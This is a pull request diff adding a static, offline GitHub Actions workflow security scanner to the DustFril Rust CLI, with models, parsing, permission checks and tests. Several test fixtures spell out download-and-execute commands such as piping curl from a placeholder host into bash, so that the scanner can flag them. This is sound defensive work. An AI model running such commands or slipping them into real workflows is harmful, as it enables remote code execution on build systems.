### PR TITLE
feat: add static GitHub Actions workflow security scanner

### DIFF
--- a/README.ko.md
+++ b/README.ko.md
@@ -25,6 +25,7 @@ DustFril은 개발 산출물을 스캔, 분석, 점검, 정리하기 위한 워�
 - 지원 lockfile의 존재 여부와 Git 상태 점검
 - 대상 개발 도구를 실행하지 않고 로컬 SHA-256 baseline과 실행 파일 무결성 비교
 - CLI 정리 이력을 운영체제 앱 데이터 디렉터리에 저장
+- 로컬 GitHub Actions 워크플로를 실행하지 않고 읽기 전용으로 보안 점검
 
 공급망 보안 스캐너는 v0.0.1 이후 작업입니다. v0.0.1 릴리스 범위는
 `AGENTS.md`에 정의된 데스크톱 산출물 정리 흐름으로 유지됩니다.
@@ -65,6 +66,7 @@ cargo run -p dustfril-cli -- dependencies --node
 cargo run -p dustfril-cli -- dependencies --compare --node
 cargo run -p dustfril-cli -- dependencies --compare --accept-baseline --node
 cargo run -p dustfril-cli -- security scan --node
+cargo run -p dustfril-cli -- security workflows
 cargo run -p dustfril-cli -- integrity scan --tool node --tool git
 ```
 
@@ -84,6 +86,7 @@ cargo run -p dustfril-cli -- analyze /path/to/workspace --node
 - `dependencies [path] [--compare] [--accept-baseline] [--rust] [--node] [--java]`
 - `security scan [path] [--node]`
 - `integrity scan [--tool <name>]...`
+- `security workflows [path]`
 
 `security scan`은 `package.json`, `Cargo.toml`, `package-lock.json`,
 `pnpm-lock.yaml`, `bun.lock`, `Cargo.lock`을 읽기 전용으로 오프라인 점검합니다.
@@ -123,6 +126,14 @@ activity history와 분리된 버전 형식의 baseline을 저장합니다. macO
 `rustc`, `git`, `java`, `gradle`이고, `--tool`을 반복해 일부만 선택할 수 있습니다.
 경로 또는 해시 변경은 무결성 변경으로 보고하며 악성 코드의 증거라고 단정하지
 않습니다. 서명 결과도 소프트웨어 전체의 신뢰성 판정이 아닙니다.
+
+security workflows는 직접적인 .github/workflows/*.yml, *.yaml 파일만
+구조적으로 읽습니다. 워크플로·job·step 구조와 환경 변수, action 입력 메타데이터를
+보존하고 기존 의심 명령 규칙을 run 내용에만 적용하며, 유효한 토큰 권한 범위와 넓은
+쓰기 권한을 점검합니다. 선언되지 않았거나 지원하지 않는 권한 의미는 추측하지 않고
+partial 분석 notice로 출력합니다. 워크플로·action을 실행하거나 expression을
+평가하지 않으며, GitHub 네트워크 및 저장소 파일도 변경하지 않습니다. 잘못되었거나
+읽을 수 없는 워크플로 파일은 명령 실패로 구분됩니다.
 
 ## 데스크톱 앱
 

--- a/README.md
+++ b/README.md
@@ -25,6 +25,7 @@ The repository is split into a reusable Rust core crate, a CLI app, and a Tauri 
 - Check supported lockfile presence and Git status
 - Compare selected development-tool executables with local SHA-256 baselines without launching them
 - Persist CLI cleanup history to the OS app data directory
+- Run a local, read-only GitHub Actions workflow security scan
 
 The supply-chain scanner is post-v0.0.1 work. The v0.0.1 release remains
 focused on the desktop artifact-cleaner workflow.
@@ -72,6 +73,7 @@ cargo run -p dustfril-cli -- dependencies --node
 cargo run -p dustfril-cli -- dependencies --compare --node
 cargo run -p dustfril-cli -- dependencies --compare --accept-baseline --node
 cargo run -p dustfril-cli -- security scan --node
+cargo run -p dustfril-cli -- security workflows
 cargo run -p dustfril-cli -- integrity scan --tool node --tool git
 cargo run -p dustfril-cli -- history
 ```
@@ -93,6 +95,7 @@ Available commands:
 - `security scan [path] [--node]`
 - `integrity scan [--tool <name>]...`
 - `history`
+- `security workflows [path]`
 
 `security scan` is a read-only, offline check of `package.json`, `Cargo.toml`,
 `package-lock.json`, `pnpm-lock.yaml`, `bun.lock`, and `Cargo.lock`. It reports
@@ -101,6 +104,15 @@ package names on a built-in list of historically compromised packages, and
 missing or changed lockfiles. Parse and read failures identify the relevant
 manifest or lockfile and fail the scan. It never runs detected commands,
 invokes a package manager, contacts the network, or modifies project files.
+
+`security workflows` inspects only direct `.github/workflows/*.yml`
+and `*.yaml` files. It parses workflow, job, and step structure,
+retains environment and action-input metadata for downstream analysis, applies
+the shared suspicious-command rules to `run:` steps, and reports
+effective broad token permissions. Undeclared or unsupported permission
+semantics are shown as partial-analysis notices. It never executes a workflow
+or action, evaluates expressions, contacts GitHub, or modifies repository
+files; malformed or unreadable workflow files fail the command.
 
 `dependencies` reports direct dependency categories, resolved lockfile nodes,
 transitive nodes where the format preserves that distinction, and packages

--- a/apps/dustfril-cli/README.md
+++ b/apps/dustfril-cli/README.md
@@ -12,6 +12,7 @@ This package exposes the `dfr` binary and wraps the shared logic from `dustfril-
 - `audit`: inspect Node lifecycle scripts
 - `dependencies`: report dependency metrics and optionally compare an explicit local baseline
 - `security scan`: inspect Node and Rust manifests and lockfiles for supply-chain risks
+- `security workflows`: inspect local GitHub Actions workflows for static security risks
 - `integrity scan`: inspect selected development-tool executables without launching them
 - `history`: load the unified local activity history as JSON
 
@@ -28,6 +29,7 @@ cargo run -p dustfril-cli -- dependencies --node
 cargo run -p dustfril-cli -- dependencies --compare --node
 cargo run -p dustfril-cli -- dependencies --compare --accept-baseline --node
 cargo run -p dustfril-cli -- security scan --node
+cargo run -p dustfril-cli -- security workflows
 cargo run -p dustfril-cli -- integrity scan --tool node --tool git
 cargo run -p dustfril-cli -- history
 ```

--- a/apps/dustfril-cli/src/cli.rs
+++ b/apps/dustfril-cli/src/cli.rs
@@ -54,6 +54,14 @@ pub struct SecurityArgs {
 pub enum SecurityCommands {
     /// Scan Node lifecycle scripts for suspicious commands
     Scan(PathArgs),
+    /// Scan local GitHub Actions workflow files without executing them
+    #[command(name = "workflows", visible_alias = "workflow")]
+    Workflows(WorkflowPathArgs),
+}
+
+#[derive(Args)]
+pub struct WorkflowPathArgs {
+    pub path: Option<PathBuf>,
 }
 
 #[derive(Args)]
@@ -218,6 +226,18 @@ mod tests {
             Commands::Security(SecurityArgs {
                 command: SecurityCommands::Scan(PathArgs { node: true, .. })
             })
+        ));
+    }
+
+    #[test]
+    fn cli_parses_workflow_security_scan_command() {
+        let cli = Cli::try_parse_from(["dfr", "security", "workflows", "workspace"]).unwrap();
+
+        assert!(matches!(
+            cli.command,
+            Commands::Security(SecurityArgs {
+                command: SecurityCommands::Workflows(WorkflowPathArgs { path: Some(path) })
+            }) if path == std::path::Path::new("workspace")
         ));
     }
 

--- a/apps/dustfril-cli/src/commands/security.rs
+++ b/apps/dustfril-cli/src/commands/security.rs
@@ -1,7 +1,7 @@
 use dustfril_core::api;
 
 use crate::{
-    cli::PathArgs,
+    cli::{PathArgs, WorkflowPathArgs},
     format,
     shared::path::{resolve_path, validate_path},
 };
@@ -42,5 +42,31 @@ pub fn scan(args: &PathArgs) -> bool {
 
     format::print_security_scan_report(&report);
 
+    true
+}
+
+/// Runs the local, read-only GitHub Actions workflow security scan.
+pub fn workflows(args: &WorkflowPathArgs) -> bool {
+    let path = match resolve_path(&args.path) {
+        Ok(path) => path,
+        Err(error) => {
+            eprintln!("Failed to resolve path: {error}");
+            return false;
+        }
+    };
+
+    if !validate_path(&path) {
+        return false;
+    }
+
+    let report = match api::workflow_scan(&path) {
+        Ok(report) => report,
+        Err(error) => {
+            eprintln!("Workflow security scan failed: {error}");
+            return false;
+        }
+    };
+
+    format::print_workflow_security_scan_report(&report);
     true
 }

--- a/apps/dustfril-cli/src/format/mod.rs
+++ b/apps/dustfril-cli/src/format/mod.rs
@@ -4,6 +4,7 @@ pub mod integrity_format;
 pub mod security_format;
 pub mod size_format;
 pub mod time_format;
+pub mod workflow_security_format;
 
 pub use audit_format::*;
 pub use dependency_format::*;
@@ -11,3 +12,4 @@ pub use integrity_format::*;
 pub use security_format::*;
 pub use size_format::*;
 pub use time_format::*;
+pub use workflow_security_format::*;

--- a/apps/dustfril-cli/src/format/workflow_security_format.rs
+++ b/apps/dustfril-cli/src/format/workflow_security_format.rs
@@ -1,0 +1,49 @@
+use dustfril_core::models::WorkflowScanReport;
+
+/// Prints the structured result of the local GitHub Actions workflow scan.
+pub fn print_workflow_security_scan_report(report: &WorkflowScanReport) {
+    println!("GitHub Actions workflow security scan\n");
+    println!("Workflows inspected: {}", report.workflows.len());
+
+    if report.is_partial() {
+        println!("Analysis status: Partial");
+    } else {
+        println!("Analysis status: Complete");
+    }
+
+    if report.findings.is_empty() {
+        println!("\nNo workflow security findings detected.");
+    } else {
+        println!("\nFound {} finding(s)\n", report.findings.len());
+        for finding in &report.findings {
+            println!("Rule:         {}", finding.rule_id);
+            println!("Category:     {}", finding.category);
+            println!("Risk Level:   {}", finding.risk_level);
+            println!("Workflow:     {}", finding.workflow_path.display());
+            if let Some(job_id) = &finding.job_id {
+                println!("Job:          {job_id}");
+            }
+            if let Some(step_index) = finding.step_index {
+                println!("Step:         {step_index}");
+            }
+            if let Some(step_name) = &finding.step_name {
+                println!("Step Name:    {step_name}");
+            }
+            if let Some(evidence) = &finding.evidence {
+                println!("Evidence:     {evidence}");
+            }
+            println!("Reason:       {}\n", finding.reason);
+        }
+    }
+
+    if !report.notices.is_empty() {
+        println!("Partial-analysis notices\n");
+        for notice in &report.notices {
+            print!("Workflow:     {}", notice.workflow_path.display());
+            if let Some(job_id) = &notice.job_id {
+                print!(" (job: {job_id})");
+            }
+            println!("\nReason:       {}\n", notice.reason);
+        }
+    }
+}

--- a/apps/dustfril-cli/src/main.rs
+++ b/apps/dustfril-cli/src/main.rs
@@ -33,6 +33,7 @@ fn main() -> ExitCode {
 
         Commands::Security(args) => match args.command {
             cli::SecurityCommands::Scan(args) => commands::security::scan(&args),
+            cli::SecurityCommands::Workflows(args) => commands::security::workflows(&args),
         },
 
         Commands::Integrity(args) => match args.command {

--- a/crates/dustfril-core/README.md
+++ b/crates/dustfril-core/README.md
@@ -100,6 +100,16 @@ only where the inventory parser can classify it; otherwise entries are
 source identifiers. If no complete inventory is available, comparison returns
 an `Unavailable` result with warnings and leaves the stored baseline untouched.
 
+The workflow scanner is exposed through the public parse_workflows and
+workflow_scan APIs. It reads only direct files below
+.github/workflows/ with yml or yaml extensions, retains workflow/job/step
+environment and action-input metadata, and applies the shared shell rules to
+run content only. Workflow and job permission overrides are modeled for
+read-all, write-all, empty, and individual none/read/write scopes. Unknown or
+undeclared effective permissions become partial-analysis notices. Malformed or
+unreadable files fail with a path-specific error. The scanner is offline,
+read-only, and never executes a workflow or action.
+
 ## Test
 
 From the workspace root:

--- a/crates/dustfril-core/src/api/mod.rs
+++ b/crates/dustfril-core/src/api/mod.rs
@@ -6,6 +6,7 @@ pub mod history;
 pub mod integrity;
 pub mod lockfile;
 pub mod scan;
+pub mod workflow;
 
 pub use analyze::*;
 pub use audit::*;
@@ -14,3 +15,4 @@ pub use dependency::*;
 pub use history::*;
 pub use lockfile::*;
 pub use scan::*;
+pub use workflow::*;

--- a/crates/dustfril-core/src/api/workflow.rs
+++ b/crates/dustfril-core/src/api/workflow.rs
@@ -1,0 +1,69 @@
+use std::path::Path;
+
+use crate::{
+    error::DustResult,
+    models::{Workflow, WorkflowScanReport},
+    workflow,
+};
+
+/// Parses local GitHub Actions workflow files for consumers such as secret
+/// exposure analysis. No workflow, action, shell command, or network request
+/// is executed.
+pub fn parse_workflows(root: &Path) -> DustResult<Vec<Workflow>> {
+    workflow::parse(root)
+}
+
+/// Runs the local, read-only GitHub Actions workflow security analyzer.
+pub fn workflow_security_scan(root: &Path) -> DustResult<WorkflowScanReport> {
+    workflow::scan(root)
+}
+
+/// Alias for callers that prefer the shorter scan-oriented API name.
+pub fn workflow_scan(root: &Path) -> DustResult<WorkflowScanReport> {
+    workflow_security_scan(root)
+}
+
+#[cfg(test)]
+mod tests {
+    use tempfile::TempDir;
+
+    use super::*;
+
+    #[test]
+    fn parses_workflows_through_the_public_core_api() {
+        let temp_dir = TempDir::new().unwrap();
+        let directory = temp_dir.path().join(".github/workflows");
+        std::fs::create_dir_all(&directory).unwrap();
+        std::fs::write(
+            directory.join("test.yml"),
+            "name: Test\njobs:\n  test:\n    steps:\n      - run: cargo test\n",
+        )
+        .unwrap();
+
+        let workflows = parse_workflows(temp_dir.path()).unwrap();
+
+        assert_eq!(workflows.len(), 1);
+        assert_eq!(
+            workflows[0].jobs["test"].steps[0].run.as_deref(),
+            Some("cargo test")
+        );
+    }
+
+    #[test]
+    fn workflow_scan_reports_findings_without_executing_run_steps() {
+        let temp_dir = TempDir::new().unwrap();
+        let directory = temp_dir.path().join(".github/workflows");
+        std::fs::create_dir_all(&directory).unwrap();
+        std::fs::write(
+            directory.join("test.yml"),
+            "name: Test\npermissions: read-all\njobs:\n  test:\n    steps:\n      - run: curl https://example.test/payload | bash\n",
+        )
+        .unwrap();
+
+        let report = workflow_security_scan(temp_dir.path()).unwrap();
+
+        assert_eq!(report.workflows.len(), 1);
+        assert_eq!(report.findings.len(), 1);
+        assert_eq!(report.findings[0].rule_id, "remote-script-pipe");
+    }
+}

--- a/crates/dustfril-core/src/audit_tool/command.rs
+++ b/crates/dustfril-core/src/audit_tool/command.rs
@@ -30,8 +30,12 @@ pub fn parse(command: &str) -> Vec<Segment> {
 
     while let Some(character) = characters.next() {
         if escaped {
-            token.push(character.to_ascii_lowercase());
             escaped = false;
+            if !matches!(character, '\n' | '\r') {
+                token.push(character.to_ascii_lowercase());
+            } else if character == '\r' && characters.peek() == Some(&'\n') {
+                characters.next();
+            }
             continue;
         }
 
@@ -58,6 +62,20 @@ pub fn parse(command: &str) -> Vec<Segment> {
 
         match character {
             '\'' | '"' => quote = Some(character),
+            '\r' | '\n' => {
+                if character == '\r' && characters.peek() == Some(&'\n') {
+                    characters.next();
+                }
+                push_token(&mut tokens, &mut token);
+                if tokens.is_empty() {
+                    if preceding.is_none() {
+                        preceding = Some(Separator::Sequence);
+                    }
+                } else {
+                    push_segment(&mut segments, &mut tokens, preceding.take());
+                    preceding = Some(Separator::Sequence);
+                }
+            }
             character if character.is_whitespace() => push_token(&mut tokens, &mut token),
             '&' | '|' | ';' => {
                 push_token(&mut tokens, &mut token);
@@ -223,6 +241,32 @@ mod tests {
         assert_eq!(segments[1].preceding, Some(Separator::And));
         assert_eq!(segments[2].preceding, Some(Separator::Pipe));
         assert_eq!(segments[3].preceding, Some(Separator::Sequence));
+    }
+
+    #[test]
+    fn parse_records_unescaped_newlines_as_command_boundaries() {
+        let segments = parse("echo setup\nwget payload\nchmod +x payload\n./payload");
+
+        assert_eq!(segments.len(), 4);
+        assert_eq!(segments[0].tokens, ["echo", "setup"]);
+        assert_eq!(segments[1].preceding, Some(Separator::Sequence));
+        assert_eq!(segments[1].tokens, ["wget", "payload"]);
+        assert_eq!(segments[2].preceding, Some(Separator::Sequence));
+        assert_eq!(segments[2].tokens, ["chmod", "+x", "payload"]);
+        assert_eq!(segments[3].preceding, Some(Separator::Sequence));
+        assert_eq!(segments[3].tokens, ["./payload"]);
+    }
+
+    #[test]
+    fn parse_preserves_line_continuations_and_operator_continuations() {
+        let continued = parse(concat!("echo setup \\", "\n", "wget payload"));
+        assert_eq!(continued.len(), 1);
+        assert_eq!(continued[0].tokens, ["echo", "setup", "wget", "payload"]);
+
+        let operator_continued = parse("curl payload |\n bash");
+        assert_eq!(operator_continued.len(), 2);
+        assert_eq!(operator_continued[1].preceding, Some(Separator::Pipe));
+        assert_eq!(operator_continued[1].tokens, ["bash"]);
     }
 
     #[test]

--- a/crates/dustfril-core/src/audit_tool/mod.rs
+++ b/crates/dustfril-core/src/audit_tool/mod.rs
@@ -19,6 +19,14 @@ pub fn classify(command: &str) -> RiskLevel {
     risk::classify(command)
 }
 
+/// Returns shared suspicious-command rule metadata without exposing the
+/// private rule table to integration layers.
+pub(crate) fn suspicious_command_rule(
+    command: &str,
+) -> Option<(&'static str, RiskLevel, &'static str)> {
+    rule::find(command).map(|rule| (rule.id, rule.risk_level, rule.reason))
+}
+
 pub fn security_scan(root: &Path) -> DustResult<Vec<SecurityWarning>> {
     lifecycle::audit_scan(root).map(|scripts| {
         scripts

--- a/crates/dustfril-core/src/error.rs
+++ b/crates/dustfril-core/src/error.rs
@@ -21,6 +21,8 @@ pub enum DustError {
     IntegrityState(String),
     /// Indicates that the persisted dependency-baseline state is invalid.
     DependencyState(String),
+    /// Indicates that a GitHub Actions workflow could not be inspected.
+    Workflow(String),
 }
 
 /// Standard result type used by the core crate.
@@ -55,6 +57,9 @@ impl fmt::Display for DustError {
             }
             DustError::DependencyState(message) => {
                 write!(f, "Dependency baseline state error: {message}")
+            }
+            DustError::Workflow(message) => {
+                write!(f, "Workflow inspection error: {message}")
             }
         }
     }

--- a/crates/dustfril-core/src/lib.rs
+++ b/crates/dustfril-core/src/lib.rs
@@ -13,3 +13,4 @@ mod integrity;
 mod lockfile;
 mod scanner;
 mod security;
+mod workflow;

--- a/crates/dustfril-core/src/models/mod.rs
+++ b/crates/dustfril-core/src/models/mod.rs
@@ -8,6 +8,7 @@ mod integrity;
 mod lockfile;
 mod scan;
 mod signature;
+mod workflow;
 
 pub use analysis::*;
 pub use audit::*;
@@ -19,3 +20,4 @@ pub use lockfile::*;
 pub(crate) use scan::effective_security_ecosystems;
 pub use scan::*;
 pub use signature::*;
+pub use workflow::*;

--- a/crates/dustfril-core/src/models/workflow.rs
+++ b/crates/dustfril-core/src/models/workflow.rs
@@ -1,0 +1,184 @@
+use std::{collections::BTreeMap, fmt, path::PathBuf};
+
+use serde::{Deserialize, Serialize};
+use serde_yaml::Value;
+
+use super::RiskLevel;
+
+/// YAML values retained from workflow environment and action input fields.
+pub type WorkflowValue = Value;
+
+/// A parsed GitHub Actions workflow file.
+///
+/// The model intentionally contains only local workflow structure. It does
+/// not resolve expressions, invoke actions, or evaluate runner state.
+#[derive(Debug, Clone, Serialize, Deserialize, PartialEq)]
+pub struct Workflow {
+    /// The local path of the workflow file.
+    pub path: PathBuf,
+    /// The optional display name declared by the workflow.
+    pub name: Option<String>,
+    /// The workflow-level token permission declaration, if present.
+    pub permissions: Option<WorkflowPermissions>,
+    /// Workflow-level environment variables.
+    pub env: BTreeMap<String, WorkflowValue>,
+    /// Jobs keyed by their stable workflow job identifiers.
+    pub jobs: BTreeMap<String, WorkflowJob>,
+}
+
+/// A parsed GitHub Actions job.
+#[derive(Debug, Clone, Serialize, Deserialize, PartialEq)]
+pub struct WorkflowJob {
+    /// The optional display name declared by the job.
+    pub name: Option<String>,
+    /// A reusable workflow reference from jobs.<id>.uses, if present.
+    pub uses: Option<String>,
+    /// Inputs for a reusable workflow invocation.
+    pub with: BTreeMap<String, WorkflowValue>,
+    /// A job-level token permission declaration, if present.
+    pub permissions: Option<WorkflowPermissions>,
+    /// Job-level environment variables.
+    pub env: BTreeMap<String, WorkflowValue>,
+    /// Steps in their source order.
+    pub steps: Vec<WorkflowStep>,
+}
+
+/// A parsed GitHub Actions step.
+#[derive(Debug, Clone, Serialize, Deserialize, PartialEq)]
+pub struct WorkflowStep {
+    /// The optional display name declared by the step.
+    pub name: Option<String>,
+    /// The optional stable step identifier declared by id.
+    pub id: Option<String>,
+    /// An action reference from uses, if this is an action step.
+    pub uses: Option<String>,
+    /// Structured action inputs from with.
+    pub with: BTreeMap<String, WorkflowValue>,
+    /// Step-level environment variables.
+    pub env: BTreeMap<String, WorkflowValue>,
+    /// Shell script content from run, if this is a shell step.
+    pub run: Option<String>,
+}
+
+/// The supported forms of a GitHub Actions permissions declaration.
+#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
+#[serde(rename_all = "kebab-case")]
+pub enum WorkflowPermissions {
+    /// Every available permission is granted read access.
+    ReadAll,
+    /// Every available permission is granted write access.
+    WriteAll,
+    /// All token permissions are disabled.
+    Empty,
+    /// Explicitly declared individual permission scopes.
+    Map(BTreeMap<String, WorkflowPermissionLevel>),
+    /// A syntactically valid YAML value whose permission semantics are not
+    /// supported by this analyzer.
+    Unknown(String),
+}
+
+/// An individual GitHub Actions token permission level.
+#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
+#[serde(rename_all = "kebab-case")]
+pub enum WorkflowPermissionLevel {
+    None,
+    Read,
+    Write,
+    /// A value outside the supported GitHub permission levels.
+    Unknown(String),
+}
+
+impl WorkflowPermissions {
+    /// Returns a deterministic human-readable summary suitable for finding
+    /// evidence and CLI output.
+    pub fn summary(&self) -> String {
+        match self {
+            Self::ReadAll => "read-all".to_owned(),
+            Self::WriteAll => "write-all".to_owned(),
+            Self::Empty => "{}".to_owned(),
+            Self::Map(permissions) => permissions
+                .iter()
+                .map(|(scope, level)| format!("{scope}: {}", level.as_str()))
+                .collect::<Vec<_>>()
+                .join(", "),
+            Self::Unknown(value) => value.clone(),
+        }
+    }
+}
+
+impl WorkflowPermissionLevel {
+    pub fn as_str(&self) -> &str {
+        match self {
+            Self::None => "none",
+            Self::Read => "read",
+            Self::Write => "write",
+            Self::Unknown(value) => value,
+        }
+    }
+}
+
+/// The security category attached to a workflow finding.
+#[derive(Debug, Clone, Copy, Serialize, Deserialize, PartialEq, Eq)]
+#[serde(rename_all = "kebab-case")]
+pub enum WorkflowFindingCategory {
+    SuspiciousCommand,
+    TokenPermissions,
+}
+
+impl fmt::Display for WorkflowFindingCategory {
+    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
+        match self {
+            Self::SuspiciousCommand => f.write_str("Suspicious command"),
+            Self::TokenPermissions => f.write_str("Token permissions"),
+        }
+    }
+}
+
+/// A structured finding produced by workflow security analysis.
+#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
+pub struct WorkflowFinding {
+    /// The workflow file containing the finding.
+    pub workflow_path: PathBuf,
+    /// The job identifier, when the finding is scoped to a job.
+    pub job_id: Option<String>,
+    /// The zero-based step index, when the finding concerns a run step.
+    pub step_index: Option<usize>,
+    /// The optional display name of the affected step.
+    pub step_name: Option<String>,
+    /// Stable rule identifier.
+    pub rule_id: String,
+    /// Broad finding category.
+    pub category: WorkflowFindingCategory,
+    /// Severity assigned by the conservative offline rule set.
+    pub risk_level: RiskLevel,
+    /// Relevant command or permission summary.
+    pub evidence: Option<String>,
+    /// Explanation of the exposure and why it was reported.
+    pub reason: String,
+}
+
+/// A partial-analysis notice that does not claim a workflow is safe.
+#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
+pub struct WorkflowScanNotice {
+    pub workflow_path: PathBuf,
+    pub job_id: Option<String>,
+    pub reason: String,
+}
+
+/// Complete result of the local, read-only workflow security scan.
+#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Default)]
+pub struct WorkflowScanReport {
+    /// Workflows successfully discovered and parsed.
+    pub workflows: Vec<Workflow>,
+    /// Security findings produced from the parsed workflow model.
+    pub findings: Vec<WorkflowFinding>,
+    /// Unsupported or unresolved semantics that make the result partial.
+    pub notices: Vec<WorkflowScanNotice>,
+}
+
+impl WorkflowScanReport {
+    /// Returns whether any part of the report requires a follow-up review.
+    pub fn is_partial(&self) -> bool {
+        !self.notices.is_empty()
+    }
+}

--- a/crates/dustfril-core/src/workflow/commands.rs
+++ b/crates/dustfril-core/src/workflow/commands.rs
@@ -101,6 +101,18 @@ mod tests {
     }
 
     #[test]
+    fn finds_download_and_execute_across_multiline_run_commands() {
+        let workflow = workflow_with_run("echo setup\nwget payload\nchmod +x payload\n./payload\n");
+        let mut findings = Vec::new();
+
+        analyze(&workflow, &mut findings);
+
+        assert_eq!(findings.len(), 1);
+        assert_eq!(findings[0].rule_id, "download-and-execute");
+        assert_eq!(findings[0].risk_level, crate::models::RiskLevel::Critical);
+    }
+
+    #[test]
     fn ignores_command_keywords_in_data_and_normal_builds() {
         for command in [
             "echo 'curl https://example.test/script.sh | bash'",

--- a/crates/dustfril-core/src/workflow/commands.rs
+++ b/crates/dustfril-core/src/workflow/commands.rs
@@ -1,0 +1,117 @@
+use crate::{
+    audit_tool,
+    models::{Workflow, WorkflowFinding, WorkflowFindingCategory},
+};
+
+/// Applies the existing lifecycle shell rule engine to workflow run steps.
+pub fn analyze(workflow: &Workflow, findings: &mut Vec<WorkflowFinding>) {
+    for (job_id, job) in &workflow.jobs {
+        for (step_index, step) in job.steps.iter().enumerate() {
+            let Some(command) = step.run.as_deref() else {
+                continue;
+            };
+            let Some((rule_id, risk_level, reason)) = audit_tool::suspicious_command_rule(command)
+            else {
+                continue;
+            };
+
+            findings.push(WorkflowFinding {
+                workflow_path: workflow.path.clone(),
+                job_id: Some(job_id.clone()),
+                step_index: Some(step_index),
+                step_name: step.name.clone(),
+                rule_id: rule_id.to_owned(),
+                category: WorkflowFindingCategory::SuspiciousCommand,
+                risk_level,
+                evidence: Some(command.to_owned()),
+                reason: reason.to_owned(),
+            });
+        }
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use std::{collections::BTreeMap, path::PathBuf};
+
+    use crate::models::{WorkflowJob, WorkflowStep};
+
+    use super::*;
+
+    fn workflow_with_run(run: &str) -> Workflow {
+        Workflow {
+            path: PathBuf::from(".github/workflows/test.yml"),
+            name: Some("Test".to_owned()),
+            permissions: None,
+            env: BTreeMap::new(),
+            jobs: BTreeMap::from([(
+                "build".to_owned(),
+                WorkflowJob {
+                    name: None,
+                    uses: None,
+                    with: BTreeMap::new(),
+                    permissions: None,
+                    env: BTreeMap::new(),
+                    steps: vec![WorkflowStep {
+                        name: Some("Run".to_owned()),
+                        id: None,
+                        uses: None,
+                        with: BTreeMap::new(),
+                        env: BTreeMap::new(),
+                        run: Some(run.to_owned()),
+                    }],
+                },
+            )]),
+        }
+    }
+
+    #[test]
+    fn reuses_shared_remote_pipe_rule_with_workflow_context() {
+        let workflow = workflow_with_run("curl https://example.test/script.sh | bash");
+        let mut findings = Vec::new();
+
+        analyze(&workflow, &mut findings);
+
+        assert_eq!(findings.len(), 1);
+        assert_eq!(findings[0].rule_id, "remote-script-pipe");
+        assert_eq!(findings[0].job_id.as_deref(), Some("build"));
+        assert_eq!(findings[0].step_index, Some(0));
+        assert_eq!(findings[0].step_name.as_deref(), Some("Run"));
+        assert_eq!(
+            findings[0].category,
+            WorkflowFindingCategory::SuspiciousCommand
+        );
+        assert!(findings[0].reason.contains("piped"));
+        assert_eq!(
+            findings[0].evidence.as_deref(),
+            Some("curl https://example.test/script.sh | bash")
+        );
+    }
+
+    #[test]
+    fn supports_the_shared_multi_step_download_and_execute_rule() {
+        let workflow = workflow_with_run("wget payload && chmod +x payload && ./payload");
+        let mut findings = Vec::new();
+
+        analyze(&workflow, &mut findings);
+
+        assert_eq!(findings.len(), 1);
+        assert_eq!(findings[0].rule_id, "download-and-execute");
+        assert_eq!(findings[0].risk_level, crate::models::RiskLevel::Critical);
+    }
+
+    #[test]
+    fn ignores_command_keywords_in_data_and_normal_builds() {
+        for command in [
+            "echo 'curl https://example.test/script.sh | bash'",
+            "cargo build",
+        ] {
+            let workflow = workflow_with_run(command);
+            let mut findings = Vec::new();
+
+            analyze(&workflow, &mut findings);
+
+            assert!(findings.is_empty(), "{command}");
+        }
+    }
+}

--- a/crates/dustfril-core/src/workflow/mod.rs
+++ b/crates/dustfril-core/src/workflow/mod.rs
@@ -1,0 +1,32 @@
+//! Local, read-only GitHub Actions workflow security analysis.
+//!
+//! Parsing is kept separate from the command and permission rules so later
+//! workflow checks, including secret-flow analysis, can consume the same
+//! parsed model without reparsing YAML.
+
+mod commands;
+mod parser;
+mod permissions;
+
+use crate::{error::DustResult, models::WorkflowScanReport};
+
+/// Discovers and parses only .github/workflows/*.yml and *.yaml files.
+pub fn parse(root: &std::path::Path) -> DustResult<Vec<crate::models::Workflow>> {
+    parser::discover_and_parse(root)
+}
+
+/// Runs all workflow checks supported by this offline analyzer.
+pub fn scan(root: &std::path::Path) -> DustResult<WorkflowScanReport> {
+    let workflows = parse(root)?;
+    let mut report = WorkflowScanReport {
+        workflows,
+        ..WorkflowScanReport::default()
+    };
+
+    for workflow in &report.workflows {
+        commands::analyze(workflow, &mut report.findings);
+        permissions::analyze(workflow, &mut report.findings, &mut report.notices);
+    }
+
+    Ok(report)
+}

--- a/crates/dustfril-core/src/workflow/parser.rs
+++ b/crates/dustfril-core/src/workflow/parser.rs
@@ -8,6 +8,25 @@ use crate::{
     models::{Workflow, WorkflowJob, WorkflowPermissionLevel, WorkflowPermissions, WorkflowStep},
 };
 
+const SUPPORTED_PERMISSION_SCOPES: &[&str] = &[
+    "actions",
+    "artifact-metadata",
+    "attestations",
+    "checks",
+    "code-quality",
+    "contents",
+    "deployments",
+    "discussions",
+    "id-token",
+    "issues",
+    "packages",
+    "pages",
+    "pull-requests",
+    "security-events",
+    "statuses",
+    "vulnerability-alerts",
+];
+
 #[derive(Debug, Deserialize)]
 struct RawWorkflow {
     #[serde(default)]
@@ -191,7 +210,14 @@ fn parse_permissions(value: &Value) -> DustResult<WorkflowPermissions> {
                         "permissions mapping contains a non-string scope".to_owned(),
                     )
                 })?;
-                permissions.insert(scope.to_owned(), parse_permission_level(level));
+                let level = if SUPPORTED_PERMISSION_SCOPES.contains(&scope) {
+                    parse_permission_level(level)
+                } else {
+                    WorkflowPermissionLevel::Unknown(format!(
+                        "unsupported permission scope: {scope}"
+                    ))
+                };
+                permissions.insert(scope.to_owned(), level);
             }
             Ok(WorkflowPermissions::Map(permissions))
         }
@@ -372,6 +398,16 @@ jobs:
         assert!(matches!(
             parse_permissions(&Value::String("future-all".into())).unwrap(),
             WorkflowPermissions::Unknown(_)
+        ));
+
+        let value: Value = serde_yaml::from_str("custom-scope: write\n").unwrap();
+        let WorkflowPermissions::Map(permissions) = parse_permissions(&value).unwrap() else {
+            panic!("expected a permission map");
+        };
+        assert!(matches!(
+            permissions.get("custom-scope"),
+            Some(WorkflowPermissionLevel::Unknown(value))
+                if value.contains("unsupported permission scope")
         ));
     }
 

--- a/crates/dustfril-core/src/workflow/parser.rs
+++ b/crates/dustfril-core/src/workflow/parser.rs
@@ -1,0 +1,417 @@
